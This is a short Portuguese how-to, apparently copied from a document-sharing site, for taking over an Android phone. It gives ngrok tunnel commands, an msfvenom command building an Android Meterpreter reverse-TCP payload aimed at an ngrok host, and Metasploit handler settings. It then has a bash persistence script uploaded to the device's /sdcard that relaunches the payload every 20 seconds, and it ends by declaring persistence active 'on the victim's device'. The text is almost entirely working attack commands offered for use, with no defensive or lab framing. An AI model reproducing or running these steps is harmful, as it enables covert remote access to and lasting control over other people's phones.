Você está na página 1de 2

____________________________________________________

1� ABA INICIE O NGROK

./NGROK TCP 4444

_____________________________________________________

ABRA UMA 2� ABA E INICIE O NGROK :

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=PORTA DO


NGROK

_____________________________________________________

ABRA UMA 3� ABA E INICIE O METASPLOIT :

msfconsole

_____________________________________________________

COM METASPLOIT JA INICIADO :

use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST 127.0.0.1 CASO DE ALGUM ERRO USE 0.0.0.0 NO LHOST

SET LPORT 4444

exploit

_____________________________________________________

ABRA UMA 4� ABA E CRIE A PERSISTENCIA COM O NANO :

nano persistencia.sh

DENTRO DA PERSISTENCIA.SH COLE O SCRIPT:

#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n
com.metasploit.stage/.MainActivity
sleep 20
done

AGORA PRA SALVAR DEEM:

CTRL+O
ENTER
CTRL+X

DEPOIS DE CRIAR E SALVAR A PERSISTENCIA VAMOS DAR PERMISSAO PARA NOS PERDEMOS
EXECUTA-LA

chmod +x persistencia.sh

PRONTO PERSISTENCIA FEITA :)


____________________________________________________________

COM A SESS�O ABERTA NO METERPRETER VAMOS FAZER UPLOAD DA PERSISTENCIA

Meterpreter> upload persistencia.sh -> /sdcard

______________________________________________________

VAMOS NAVEGAR PELA SHELL E EXECUTAR O SCRIPT :

shell

cd /sdcard

ls

sh persistencia.sh

_____________________________________________________

PRONTO...PERSISTENCIA ATIVA NO DISPOSITIVO DA VITIMA

PS: NAO FECHEM A JANELA DO NGROK , SE NAO VOCES NAO TERAM ACESSO MAS AQUELE
DISPOSITIVO
_____________________________________________________

Você também pode gostar